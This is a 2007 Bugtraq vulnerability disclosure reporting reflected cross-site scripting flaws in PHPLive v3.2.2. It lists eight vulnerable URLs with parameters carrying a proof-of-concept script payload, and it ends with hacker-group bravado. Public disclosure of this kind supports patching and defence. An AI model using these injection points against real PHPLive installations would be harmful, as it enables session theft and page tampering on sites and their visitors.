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Message-Id: <E1HuAKP-000511-KH@rancor.nocdirect.com>
Date: Fri, 01 Jun 2007 12:50:17 -0400
From: dr.rezen@...il.com
To: bugtraq@...urityfocus.com
Subject: bugtraq submission

There are numerous XSS vulnerabilities in PHPLive v3.2.2 (Maybe others)

/phplive/chat.php?sid=<script>alert(123);</script>
/phplive/help.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/help.php?PHPLIVE_VERSION=<script>alert(123);</script>
/phplive/admin/header.php?admin[name]=<script>alert(123);</script>
/phplive/super/info.php?BASE_URL=<script>alert(123);</script>

And if serveradmin left default setup install files:

/phplive/setup/footer.php?LANG[DEFAULT_BRANDING]=<script>alert(123);</script>
/phplive/setup/footer.php?PHPLIVE_VERSION=<script>alert(123);</script>
/phplive/setup/footer.php?nav_line=<script>alert(123);</script>

Bug found by ReZEN! XORCREW! H4X H4X!

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